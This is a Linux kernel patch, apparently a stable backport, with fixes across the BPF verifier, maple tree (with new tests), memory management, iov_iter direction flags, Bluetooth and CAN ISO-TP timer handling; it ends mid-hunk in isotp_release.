+@@ -51,7 +51,6 @@ BTF_SET_END(bpf_lsm_current_hooks)
+  */
+ BTF_SET_START(bpf_lsm_locked_sockopt_hooks)
+ #ifdef CONFIG_SECURITY_NETWORK
+-BTF_ID(func, bpf_lsm_socket_sock_rcv_skb)
+ BTF_ID(func, bpf_lsm_sock_graft)
+ BTF_ID(func, bpf_lsm_inet_csk_clone)
+ BTF_ID(func, bpf_lsm_inet_conn_established)
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index efdbba2a0230e..a7c2f0c3fc19c 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -7607,9 +7607,9 @@ int register_btf_id_dtor_kfuncs(const struct btf_id_dtor_kfunc *dtors, u32 add_c
+ 
+ 	sort(tab->dtors, tab->cnt, sizeof(tab->dtors[0]), btf_id_cmp_func, NULL);
+ 
+-	return 0;
+ end:
+-	btf_free_dtor_kfunc_tab(btf);
++	if (ret)
++		btf_free_dtor_kfunc_tab(btf);
+ 	btf_put(btf);
+ 	return ret;
+ }
+diff --git a/kernel/bpf/memalloc.c b/kernel/bpf/memalloc.c
+index 4901fa1048cd7..6187c28d266f0 100644
+--- a/kernel/bpf/memalloc.c
++++ b/kernel/bpf/memalloc.c
+@@ -71,7 +71,7 @@ static int bpf_mem_cache_idx(size_t size)
+ 	if (size <= 192)
+ 		return size_index[(size - 1) / 8] - 1;
+ 
+-	return fls(size - 1) - 1;
++	return fls(size - 1) - 2;
+ }
+ 
+ #define NUM_CACHES 11
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 398a0008aff72..ea21e008bf856 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -2664,6 +2664,12 @@ static int backtrack_insn(struct bpf_verifier_env *env, int idx,
+ 		if (opcode == BPF_CALL) {
+ 			if (insn->src_reg == BPF_PSEUDO_CALL)
+ 				return -ENOTSUPP;
++			/* kfunc with imm==0 is invalid and fixup_kfunc_call will
++			 * catch this error later. Make backtracking conservative
++			 * with ENOTSUPP.
++			 */
++			if (insn->src_reg == BPF_PSEUDO_KFUNC_CALL && insn->imm == 0)
++				return -ENOTSUPP;
+ 			/* regular helper call sets R0 */
+ 			*reg_mask &= ~1;
+ 			if (*reg_mask & 0x3f) {
+@@ -3011,13 +3017,24 @@ static bool __is_pointer_value(bool allow_ptr_leaks,
+ 	return reg->type != SCALAR_VALUE;
+ }
+ 
++/* Copy src state preserving dst->parent and dst->live fields */
++static void copy_register_state(struct bpf_reg_state *dst, const struct bpf_reg_state *src)
++{
++	struct bpf_reg_state *parent = dst->parent;
++	enum bpf_reg_liveness live = dst->live;
++
++	*dst = *src;
++	dst->parent = parent;
++	dst->live = live;
++}
++
+ static void save_register_state(struct bpf_func_state *state,
+ 				int spi, struct bpf_reg_state *reg,
+ 				int size)
+ {
+ 	int i;
+ 
+-	state->stack[spi].spilled_ptr = *reg;
++	copy_register_state(&state->stack[spi].spilled_ptr, reg);
+ 	if (size == BPF_REG_SIZE)
+ 		state->stack[spi].spilled_ptr.live |= REG_LIVE_WRITTEN;
+ 
+@@ -3345,7 +3362,7 @@ static int check_stack_read_fixed_off(struct bpf_verifier_env *env,
+ 				 */
+ 				s32 subreg_def = state->regs[dst_regno].subreg_def;
+ 
+-				state->regs[dst_regno] = *reg;
++				copy_register_state(&state->regs[dst_regno], reg);
+ 				state->regs[dst_regno].subreg_def = subreg_def;
+ 			} else {
+ 				for (i = 0; i < size; i++) {
+@@ -3366,7 +3383,7 @@ static int check_stack_read_fixed_off(struct bpf_verifier_env *env,
+ 
+ 		if (dst_regno >= 0) {
+ 			/* restore register state from stack */
+-			state->regs[dst_regno] = *reg;
++			copy_register_state(&state->regs[dst_regno], reg);
+ 			/* mark reg as written since spilled pointer state likely
+ 			 * has its liveness marks cleared by is_state_visited()
+ 			 * which resets stack/reg liveness for state transitions
+@@ -8085,7 +8102,7 @@ do_sim:
+ 	 */
+ 	if (!ptr_is_dst_reg) {
+ 		tmp = *dst_reg;
+-		*dst_reg = *ptr_reg;
++		copy_register_state(dst_reg, ptr_reg);
+ 	}
+ 	ret = sanitize_speculative_path(env, NULL, env->insn_idx + 1,
+ 					env->insn_idx);
+@@ -9338,7 +9355,7 @@ static int check_alu_op(struct bpf_verifier_env *env, struct bpf_insn *insn)
+ 					 * to propagate min/max range.
+ 					 */
+ 					src_reg->id = ++env->id_gen;
+-				*dst_reg = *src_reg;
++				copy_register_state(dst_reg, src_reg);
+ 				dst_reg->live |= REG_LIVE_WRITTEN;
+ 				dst_reg->subreg_def = DEF_NOT_SUBREG;
+ 			} else {
+@@ -9349,7 +9366,7 @@ static int check_alu_op(struct bpf_verifier_env *env, struct bpf_insn *insn)
+ 						insn->src_reg);
+ 					return -EACCES;
+ 				} else if (src_reg->type == SCALAR_VALUE) {
+-					*dst_reg = *src_reg;
++					copy_register_state(dst_reg, src_reg);
+ 					/* Make sure ID is cleared otherwise
+ 					 * dst_reg min/max could be incorrectly
+ 					 * propagated into src_reg by find_equal_scalars()
+@@ -10145,7 +10162,7 @@ static void find_equal_scalars(struct bpf_verifier_state *vstate,
+ 
+ 	bpf_for_each_reg_in_vstate(vstate, state, reg, ({
+ 		if (reg->type == SCALAR_VALUE && reg->id == known_reg->id)
+-			*reg = *known_reg;
++			copy_register_state(reg, known_reg);
+ 	}));
+ }
+ 
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index b474289c15b82..a753adcbc7c70 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -1342,7 +1342,7 @@ static int update_parent_subparts_cpumask(struct cpuset *cs, int cmd,
+ 		 * A parent can be left with no CPU as long as there is no
+ 		 * task directly associated with the parent partition.
+ 		 */
+-		if (!cpumask_intersects(cs->cpus_allowed, parent->effective_cpus) &&
++		if (cpumask_subset(parent->effective_cpus, cs->cpus_allowed) &&
+ 		    partition_is_populated(parent, cs))
+ 			return PERR_NOCPUS;
+ 
+@@ -2320,6 +2320,7 @@ out:
+ 		new_prs = -new_prs;
+ 	spin_lock_irq(&callback_lock);
+ 	cs->partition_root_state = new_prs;
++	WRITE_ONCE(cs->prs_err, err);
+ 	spin_unlock_irq(&callback_lock);
+ 	/*
+ 	 * Update child cpusets, if present.
+diff --git a/kernel/irq/irqdomain.c b/kernel/irq/irqdomain.c
+index 8fe1da9614ee8..e2096b51c0047 100644
+--- a/kernel/irq/irqdomain.c
++++ b/kernel/irq/irqdomain.c
+@@ -1915,7 +1915,7 @@ static void debugfs_add_domain_dir(struct irq_domain *d)
+ 
+ static void debugfs_remove_domain_dir(struct irq_domain *d)
+ {
+-	debugfs_remove(debugfs_lookup(d->name, domain_dir));
++	debugfs_lookup_and_remove(d->name, domain_dir);
+ }
+ 
+ void __init irq_domain_debugfs_init(struct dentry *root)
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index eb8c117cc8b6c..9d4163abadf4e 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -832,6 +832,7 @@ static void do_bpf_send_signal(struct irq_work *entry)
+ 
+ 	work = container_of(entry, struct send_signal_irq_work, irq_work);
+ 	group_send_sig_info(work->sig, SEND_SIG_PRIV, work->task, work->type);
++	put_task_struct(work->task);
+ }
+ 
+ static int bpf_send_signal_common(u32 sig, enum pid_type type)
+@@ -866,7 +867,7 @@ static int bpf_send_signal_common(u32 sig, enum pid_type type)
+ 		 * to the irq_work. The current task may change when queued
+ 		 * irq works get executed.
+ 		 */
+-		work->task = current;
++		work->task = get_task_struct(current);
+ 		work->sig = sig;
+ 		work->type = type;
+ 		irq_work_queue(&work->irq_work);
+diff --git a/kernel/trace/trace_events_user.c b/kernel/trace/trace_events_user.c
+index 9cb53182bb31c..908e8a13c675b 100644
+--- a/kernel/trace/trace_events_user.c
++++ b/kernel/trace/trace_events_user.c
+@@ -1489,7 +1489,7 @@ static ssize_t user_events_write(struct file *file, const char __user *ubuf,
+ 	if (unlikely(*ppos != 0))
+ 		return -EFAULT;
+ 
+-	if (unlikely(import_single_range(WRITE, (char __user *)ubuf,
++	if (unlikely(import_single_range(ITER_SOURCE, (char __user *)ubuf,
+ 					 count, &iov, &i)))
+ 		return -EFAULT;
+ 
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index fe21bf276d91c..69cb44b035ec1 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -665,12 +665,13 @@ static inline unsigned long mte_pivot(const struct maple_enode *mn,
+ 				 unsigned char piv)
+ {
+ 	struct maple_node *node = mte_to_node(mn);
++	enum maple_type type = mte_node_type(mn);
+ 
+-	if (piv >= mt_pivots[piv]) {
++	if (piv >= mt_pivots[type]) {
+ 		WARN_ON(1);
+ 		return 0;
+ 	}
+-	switch (mte_node_type(mn)) {
++	switch (type) {
+ 	case maple_arange_64:
+ 		return node->ma64.pivot[piv];
+ 	case maple_range_64:
+@@ -4882,7 +4883,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 	unsigned long *pivots, *gaps;
+ 	void __rcu **slots;
+ 	unsigned long gap = 0;
+-	unsigned long max, min, index;
++	unsigned long max, min;
+ 	unsigned char offset;
+ 
+ 	if (unlikely(mas_is_err(mas)))
+@@ -4904,8 +4905,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 		min = mas_safe_min(mas, pivots, --offset);
+ 
+ 	max = mas_safe_pivot(mas, pivots, offset, type);
+-	index = mas->index;
+-	while (index <= max) {
++	while (mas->index <= max) {
+ 		gap = 0;
+ 		if (gaps)
+ 			gap = gaps[offset];
+@@ -4936,10 +4936,8 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 		min = mas_safe_min(mas, pivots, offset);
+ 	}
+ 
+-	if (unlikely(index > max)) {
+-		mas_set_err(mas, -EBUSY);
+-		return false;
+-	}
++	if (unlikely((mas->index > max) || (size - 1 > max - mas->index)))
++		goto no_space;
+ 
+ 	if (unlikely(ma_is_leaf(type))) {
+ 		mas->offset = offset;
+@@ -4956,9 +4954,11 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 	return false;
+ 
+ ascend:
+-	if (mte_is_root(mas->node))
+-		mas_set_err(mas, -EBUSY);
++	if (!mte_is_root(mas->node))
++		return false;
+ 
++no_space:
++	mas_set_err(mas, -EBUSY);
+ 	return false;
+ }
+ 
+diff --git a/lib/test_maple_tree.c b/lib/test_maple_tree.c
+index 497fc93ccf9ec..ec847bf4dcb4d 100644
+--- a/lib/test_maple_tree.c
++++ b/lib/test_maple_tree.c
+@@ -2517,6 +2517,91 @@ static noinline void check_bnode_min_spanning(struct maple_tree *mt)
+ 	mt_set_non_kernel(0);
+ }
+ 
++static noinline void check_empty_area_window(struct maple_tree *mt)
++{
++	unsigned long i, nr_entries = 20;
++	MA_STATE(mas, mt, 0, 0);
++
++	for (i = 1; i <= nr_entries; i++)
++		mtree_store_range(mt, i*10, i*10 + 9,
++				  xa_mk_value(i), GFP_KERNEL);
++
++	/* Create another hole besides the one at 0 */
++	mtree_store_range(mt, 160, 169, NULL, GFP_KERNEL);
++
++	/* Check lower bounds that don't fit */
++	rcu_read_lock();
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 5, 90, 10) != -EBUSY);
++
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 6, 90, 5) != -EBUSY);
++
++	/* Check lower bound that does fit */
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 5, 90, 5) != 0);
++	MT_BUG_ON(mt, mas.index != 5);
++	MT_BUG_ON(mt, mas.last != 9);
++	rcu_read_unlock();
++
++	/* Check one gap that doesn't fit and one that does */
++	rcu_read_lock();
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 5, 217, 9) != 0);
++	MT_BUG_ON(mt, mas.index != 161);
++	MT_BUG_ON(mt, mas.last != 169);
++
++	/* Check one gap that does fit above the min */
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 100, 218, 3) != 0);
++	MT_BUG_ON(mt, mas.index != 216);
++	MT_BUG_ON(mt, mas.last != 218);
++
++	/* Check size that doesn't fit any gap */
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 100, 218, 16) != -EBUSY);
++
++	/*
++	 * Check size that doesn't fit the lower end of the window but
++	 * does fit the gap
++	 */
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 167, 200, 4) != -EBUSY);
++
++	/*
++	 * Check size that doesn't fit the upper end of the window but
++	 * does fit the gap
++	 */
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area_rev(&mas, 100, 162, 4) != -EBUSY);
++
++	/* Check mas_empty_area forward */
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area(&mas, 0, 100, 9) != 0);
++	MT_BUG_ON(mt, mas.index != 0);
++	MT_BUG_ON(mt, mas.last != 8);
++
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area(&mas, 0, 100, 4) != 0);
++	MT_BUG_ON(mt, mas.index != 0);
++	MT_BUG_ON(mt, mas.last != 3);
++
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area(&mas, 0, 100, 11) != -EBUSY);
++
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area(&mas, 5, 100, 6) != -EBUSY);
++
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area(&mas, 0, 8, 10) != -EBUSY);
++
++	mas_reset(&mas);
++	mas_empty_area(&mas, 100, 165, 3);
++
++	mas_reset(&mas);
++	MT_BUG_ON(mt, mas_empty_area(&mas, 100, 163, 6) != -EBUSY);
++	rcu_read_unlock();
++}
++
+ static DEFINE_MTREE(tree);
+ static int maple_tree_seed(void)
+ {
+@@ -2765,6 +2850,10 @@ static int maple_tree_seed(void)
+ 	check_bnode_min_spanning(&tree);
+ 	mtree_destroy(&tree);
+ 
++	mt_init_flags(&tree, MT_FLAGS_ALLOC_RANGE);
++	check_empty_area_window(&tree);
++	mtree_destroy(&tree);
++
+ #if defined(BENCH)
+ skip:
+ #endif
+diff --git a/mm/khugepaged.c b/mm/khugepaged.c
+index c982b250aa317..e0c7bbd69b33e 100644
+--- a/mm/khugepaged.c
++++ b/mm/khugepaged.c
+@@ -847,6 +847,10 @@ static int hugepage_vma_revalidate(struct mm_struct *mm, unsigned long address,
+ 	return SCAN_SUCCEED;
+ }
+ 
++/*
++ * See pmd_trans_unstable() for how the result may change out from
++ * underneath us, even if we hold mmap_lock in read.
++ */
+ static int find_pmd_or_thp_or_none(struct mm_struct *mm,
+ 				   unsigned long address,
+ 				   pmd_t **pmd)
+@@ -865,8 +869,12 @@ static int find_pmd_or_thp_or_none(struct mm_struct *mm,
+ #endif
+ 	if (pmd_none(pmde))
+ 		return SCAN_PMD_NONE;
++	if (!pmd_present(pmde))
++		return SCAN_PMD_NULL;
+ 	if (pmd_trans_huge(pmde))
+ 		return SCAN_PMD_MAPPED;
++	if (pmd_devmap(pmde))
++		return SCAN_PMD_NULL;
+ 	if (pmd_bad(pmde))
+ 		return SCAN_PMD_NULL;
+ 	return SCAN_SUCCEED;
+@@ -1649,7 +1657,7 @@ static int retract_page_tables(struct address_space *mapping, pgoff_t pgoff,
+ 		 * has higher cost too. It would also probably require locking
+ 		 * the anon_vma.
+ 		 */
+-		if (vma->anon_vma) {
++		if (READ_ONCE(vma->anon_vma)) {
+ 			result = SCAN_PAGE_ANON;
+ 			goto next;
+ 		}
+@@ -1677,6 +1685,18 @@ static int retract_page_tables(struct address_space *mapping, pgoff_t pgoff,
+ 		result = SCAN_PTE_MAPPED_HUGEPAGE;
+ 		if ((cc->is_khugepaged || is_target) &&
+ 		    mmap_write_trylock(mm)) {
++			/*
++			 * Re-check whether we have an ->anon_vma, because
++			 * collapse_and_free_pmd() requires that either no
++			 * ->anon_vma exists or the anon_vma is locked.
++			 * We already checked ->anon_vma above, but that check
++			 * is racy because ->anon_vma can be populated under the
++			 * mmap lock in read mode.
++			 */
++			if (vma->anon_vma) {
++				result = SCAN_PAGE_ANON;
++				goto unlock_next;
++			}
+ 			/*
+ 			 * When a vma is registered with uffd-wp, we can't
+ 			 * recycle the pmd pgtable because there can be pte
+diff --git a/mm/madvise.c b/mm/madvise.c
+index b913ba6efc10b..d03e149ffe6e8 100644
+--- a/mm/madvise.c
++++ b/mm/madvise.c
+@@ -1459,7 +1459,7 @@ SYSCALL_DEFINE5(process_madvise, int, pidfd, const struct iovec __user *, vec,
+ 		goto out;
+ 	}
+ 
+-	ret = import_iovec(READ, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
++	ret = import_iovec(ITER_DEST, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
+ 	if (ret < 0)
+ 		goto out;
+ 
+diff --git a/mm/memory.c b/mm/memory.c
+index 8c8420934d603..f6f93e5b6b023 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -875,12 +875,8 @@ copy_nonpresent_pte(struct mm_struct *dst_mm, struct mm_struct *src_mm,
+ 			return -EBUSY;
+ 		return -ENOENT;
+ 	} else if (is_pte_marker_entry(entry)) {
+-		/*
+-		 * We're copying the pgtable should only because dst_vma has
+-		 * uffd-wp enabled, do sanity check.
+-		 */
+-		WARN_ON_ONCE(!userfaultfd_wp(dst_vma));
+-		set_pte_at(dst_mm, addr, dst_pte, pte);
++		if (userfaultfd_wp(dst_vma))
++			set_pte_at(dst_mm, addr, dst_pte, pte);
+ 		return 0;
+ 	}
+ 	if (!userfaultfd_wp(dst_vma))
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index 02c8a712282f1..f940395667c82 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -600,7 +600,8 @@ static int queue_pages_hugetlb(pte_t *pte, unsigned long hmask,
+ 
+ 	/* With MPOL_MF_MOVE, we migrate only unshared hugepage. */
+ 	if (flags & (MPOL_MF_MOVE_ALL) ||
+-	    (flags & MPOL_MF_MOVE && page_mapcount(page) == 1)) {
++	    (flags & MPOL_MF_MOVE && page_mapcount(page) == 1 &&
++	     !hugetlb_pmd_shared(pte))) {
+ 		if (isolate_hugetlb(page, qp->pagelist) &&
+ 			(flags & MPOL_MF_STRICT))
+ 			/*
+diff --git a/mm/mremap.c b/mm/mremap.c
+index fe587c5d65913..930f65c315c02 100644
+--- a/mm/mremap.c
++++ b/mm/mremap.c
+@@ -1027,16 +1027,29 @@ SYSCALL_DEFINE5(mremap, unsigned long, addr, unsigned long, old_len,
+ 			}
+ 
+ 			/*
+-			 * Function vma_merge() is called on the extension we are adding to
+-			 * the already existing vma, vma_merge() will merge this extension with
+-			 * the already existing vma (expand operation itself) and possibly also
+-			 * with the next vma if it becomes adjacent to the expanded vma and
+-			 * otherwise compatible.
++			 * Function vma_merge() is called on the extension we
++			 * are adding to the already existing vma, vma_merge()
++			 * will merge this extension with the already existing
++			 * vma (expand operation itself) and possibly also with
++			 * the next vma if it becomes adjacent to the expanded
++			 * vma and  otherwise compatible.
++			 *
++			 * However, vma_merge() can currently fail due to
++			 * is_mergeable_vma() check for vm_ops->close (see the
++			 * comment there). Yet this should not prevent vma
++			 * expanding, so perform a simple expand for such vma.
++			 * Ideally the check for close op should be only done
++			 * when a vma would be actually removed due to a merge.
+ 			 */
+-			vma = vma_merge(mm, vma, extension_start, extension_end,
++			if (!vma->vm_ops || !vma->vm_ops->close) {
++				vma = vma_merge(mm, vma, extension_start, extension_end,
+ 					vma->vm_flags, vma->anon_vma, vma->vm_file,
+ 					extension_pgoff, vma_policy(vma),
+ 					vma->vm_userfaultfd_ctx, anon_vma_name(vma));
++			} else if (vma_adjust(vma, vma->vm_start, addr + new_len,
++				   vma->vm_pgoff, NULL)) {
++				vma = NULL;
++			}
+ 			if (!vma) {
+ 				vm_unacct_memory(pages);
+ 				ret = -ENOMEM;
+diff --git a/mm/page_io.c b/mm/page_io.c
+index 2af34dd8fa4db..3a5f921b932e8 100644
+--- a/mm/page_io.c
++++ b/mm/page_io.c
+@@ -376,7 +376,7 @@ void swap_write_unplug(struct swap_iocb *sio)
+ 	struct address_space *mapping = sio->iocb.ki_filp->f_mapping;
+ 	int ret;
+ 
+-	iov_iter_bvec(&from, WRITE, sio->bvec, sio->pages, sio->len);
++	iov_iter_bvec(&from, ITER_SOURCE, sio->bvec, sio->pages, sio->len);
+ 	ret = mapping->a_ops->swap_rw(&sio->iocb, &from);
+ 	if (ret != -EIOCBQUEUED)
+ 		sio_write_complete(&sio->iocb, ret);
+@@ -530,7 +530,7 @@ void __swap_read_unplug(struct swap_iocb *sio)
+ 	struct address_space *mapping = sio->iocb.ki_filp->f_mapping;
+ 	int ret;
+ 
+-	iov_iter_bvec(&from, READ, sio->bvec, sio->pages, sio->len);
++	iov_iter_bvec(&from, ITER_DEST, sio->bvec, sio->pages, sio->len);
+ 	ret = mapping->a_ops->swap_rw(&sio->iocb, &from);
+ 	if (ret != -EIOCBQUEUED)
+ 		sio_read_complete(&sio->iocb, ret);
+diff --git a/mm/process_vm_access.c b/mm/process_vm_access.c
+index 4bcc119580890..78dfaf9e8990a 100644
+--- a/mm/process_vm_access.c
++++ b/mm/process_vm_access.c
+@@ -263,7 +263,7 @@ static ssize_t process_vm_rw(pid_t pid,
+ 	struct iovec *iov_r;
+ 	struct iov_iter iter;
+ 	ssize_t rc;
+-	int dir = vm_write ? WRITE : READ;
++	int dir = vm_write ? ITER_SOURCE : ITER_DEST;
+ 
+ 	if (flags != 0)
+ 		return -EINVAL;
+diff --git a/mm/swapfile.c b/mm/swapfile.c
+index 72e481aacd5df..b72908df52ac9 100644
+--- a/mm/swapfile.c
++++ b/mm/swapfile.c
+@@ -1101,6 +1101,7 @@ start_over:
+ 			goto check_out;
+ 		pr_debug("scan_swap_map of si %d failed to find offset\n",
+ 			si->type);
++		cond_resched();
+ 
+ 		spin_lock(&swap_avail_lock);
+ nextsi:
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index 8fcc5fa768c07..96eb9da372cd7 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -3290,13 +3290,16 @@ void lru_gen_migrate_mm(struct mm_struct *mm)
+ 	if (mem_cgroup_disabled())
+ 		return;
+ 
++	/* migration can happen before addition */
++	if (!mm->lru_gen.memcg)
++		return;
++
+ 	rcu_read_lock();
+ 	memcg = mem_cgroup_from_task(task);
+ 	rcu_read_unlock();
+ 	if (memcg == mm->lru_gen.memcg)
+ 		return;
+ 
+-	VM_WARN_ON_ONCE(!mm->lru_gen.memcg);
+ 	VM_WARN_ON_ONCE(list_empty(&mm->lru_gen.list));
+ 
+ 	lru_gen_del_mm(mm);
+diff --git a/net/9p/client.c b/net/9p/client.c
+index b5aa25f82b78d..554a4b11f4fec 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -2049,7 +2049,7 @@ int p9_client_readdir(struct p9_fid *fid, char *data, u32 count, u64 offset)
+ 	struct kvec kv = {.iov_base = data, .iov_len = count};
+ 	struct iov_iter to;
+ 
+-	iov_iter_kvec(&to, READ, &kv, 1, count);
++	iov_iter_kvec(&to, ITER_DEST, &kv, 1, count);
+ 
+ 	p9_debug(P9_DEBUG_9P, ">>> TREADDIR fid %d offset %llu count %d\n",
+ 		 fid->fid, offset, count);
+diff --git a/net/bluetooth/6lowpan.c b/net/bluetooth/6lowpan.c
+index c57d643afb108..4eb1b3ced0d27 100644
+--- a/net/bluetooth/6lowpan.c
++++ b/net/bluetooth/6lowpan.c
+@@ -441,7 +441,7 @@ static int send_pkt(struct l2cap_chan *chan, struct sk_buff *skb,
+ 	iv.iov_len = skb->len;
+ 
+ 	memset(&msg, 0, sizeof(msg));
+-	iov_iter_kvec(&msg.msg_iter, WRITE, &iv, 1, skb->len);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, &iv, 1, skb->len);
+ 
+ 	err = l2cap_chan_send(chan, &msg, skb->len);
+ 	if (err > 0) {
+diff --git a/net/bluetooth/a2mp.c b/net/bluetooth/a2mp.c
+index 1fcc482397c36..e7adb8a98cf90 100644
+--- a/net/bluetooth/a2mp.c
++++ b/net/bluetooth/a2mp.c
+@@ -56,7 +56,7 @@ static void a2mp_send(struct amp_mgr *mgr, u8 code, u8 ident, u16 len, void *dat
+ 
+ 	memset(&msg, 0, sizeof(msg));
+ 
+-	iov_iter_kvec(&msg.msg_iter, WRITE, &iv, 1, total_len);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, &iv, 1, total_len);
+ 
+ 	l2cap_chan_send(chan, &msg, total_len);
+ 
+diff --git a/net/bluetooth/smp.c b/net/bluetooth/smp.c
+index 11f853d0500ff..70663229b3cc9 100644
+--- a/net/bluetooth/smp.c
++++ b/net/bluetooth/smp.c
+@@ -605,7 +605,7 @@ static void smp_send_cmd(struct l2cap_conn *conn, u8 code, u16 len, void *data)
+ 
+ 	memset(&msg, 0, sizeof(msg));
+ 
+-	iov_iter_kvec(&msg.msg_iter, WRITE, iv, 2, 1 + len);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, iv, 2, 1 + len);
+ 
+ 	l2cap_chan_send(chan, &msg, 1 + len);
+ 
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index f20f4373ff408..9554abcfd5b4e 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -871,6 +871,7 @@ static unsigned int ip_sabotage_in(void *priv,
+ 	if (nf_bridge && !nf_bridge->in_prerouting &&
+ 	    !netif_is_l3_master(skb->dev) &&
+ 	    !netif_is_l3_slave(skb->dev)) {
++		nf_bridge_info_free(skb);
+ 		state->okfn(state->net, state->sk, skb);
+ 		return NF_STOLEN;
+ 	}
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index 608f8c24ae46b..fc81d77724a13 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -140,7 +140,7 @@ struct isotp_sock {
+ 	canid_t rxid;
+ 	ktime_t tx_gap;
+ 	ktime_t lastrxcf_tstamp;
+-	struct hrtimer rxtimer, txtimer;
++	struct hrtimer rxtimer, txtimer, txfrtimer;
+ 	struct can_isotp_options opt;
+ 	struct can_isotp_fc_options rxfc, txfc;
+ 	struct can_isotp_ll_options ll;
+@@ -871,7 +871,7 @@ static void isotp_rcv_echo(struct sk_buff *skb, void *data)
+ 	}
+ 
+ 	/* start timer to send next consecutive frame with correct delay */
+-	hrtimer_start(&so->txtimer, so->tx_gap, HRTIMER_MODE_REL_SOFT);
++	hrtimer_start(&so->txfrtimer, so->tx_gap, HRTIMER_MODE_REL_SOFT);
+ }
+ 
+ static enum hrtimer_restart isotp_tx_timer_handler(struct hrtimer *hrtimer)
+@@ -879,49 +879,39 @@ static enum hrtimer_restart isotp_tx_timer_handler(struct hrtimer *hrtimer)
+ 	struct isotp_sock *so = container_of(hrtimer, struct isotp_sock,
+ 					     txtimer);
+ 	struct sock *sk = &so->sk;
+-	enum hrtimer_restart restart = HRTIMER_NORESTART;
+ 
+-	switch (so->tx.state) {
+-	case ISOTP_SENDING:
+-
+-		/* cfecho should be consumed by isotp_rcv_echo() here */
+-		if (!so->cfecho) {
+-			/* start timeout for unlikely lost echo skb */
+-			hrtimer_set_expires(&so->txtimer,
+-					    ktime_add(ktime_get(),
+-						      ktime_set(ISOTP_ECHO_TIMEOUT, 0)));
+-			restart = HRTIMER_RESTART;
++	/* don't handle timeouts in IDLE state */
++	if (so->tx.state == ISOTP_IDLE)
++		return HRTIMER_NORESTART;
+ 
+-			/* push out the next consecutive frame */
+-			isotp_send_cframe(so);
+-			break;
+-		}
++	/* we did not get any flow control or echo frame in time */
+ 
+-		/* cfecho has not been cleared in isotp_rcv_echo() */
+-		pr_notice_once("can-isotp: cfecho %08X timeout\n", so->cfecho);
+-		fallthrough;
++	/* report 'communication error on send' */
++	sk->sk_err = ECOMM;
++	if (!sock_flag(sk, SOCK_DEAD))
++		sk_error_report(sk);
+ 
+-	case ISOTP_WAIT_FC:
+-	case ISOTP_WAIT_FIRST_FC:
++	/* reset tx state */
++	so->tx.state = ISOTP_IDLE;
++	wake_up_interruptible(&so->wait);
+ 
+-		/* we did not get any flow control frame in time */
++	return HRTIMER_NORESTART;
++}
+ 
+-		/* report 'communication error on send' */
+-		sk->sk_err = ECOMM;
+-		if (!sock_flag(sk, SOCK_DEAD))
+-			sk_error_report(sk);
++static enum hrtimer_restart isotp_txfr_timer_handler(struct hrtimer *hrtimer)
++{
++	struct isotp_sock *so = container_of(hrtimer, struct isotp_sock,
++					     txfrtimer);
+ 
+-		/* reset tx state */
+-		so->tx.state = ISOTP_IDLE;
+-		wake_up_interruptible(&so->wait);
+-		break;
++	/* start echo timeout handling and cover below protocol error */
++	hrtimer_start(&so->txtimer, ktime_set(ISOTP_ECHO_TIMEOUT, 0),
++		      HRTIMER_MODE_REL_SOFT);
+ 
+-	default:
+-		WARN_ONCE(1, "can-isotp: tx timer state %08X cfecho %08X\n",
+-			  so->tx.state, so->cfecho);
+-	}
++	/* cfecho should be consumed by isotp_rcv_echo() here */
++	if (so->tx.state == ISOTP_SENDING && !so->cfecho)
++		isotp_send_cframe(so);
+ 
+-	return restart;
++	return HRTIMER_NORESTART;
+ }
+ 
+ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+@@ -1162,6 +1152,10 @@ static int isotp_release(struct socket *sock)
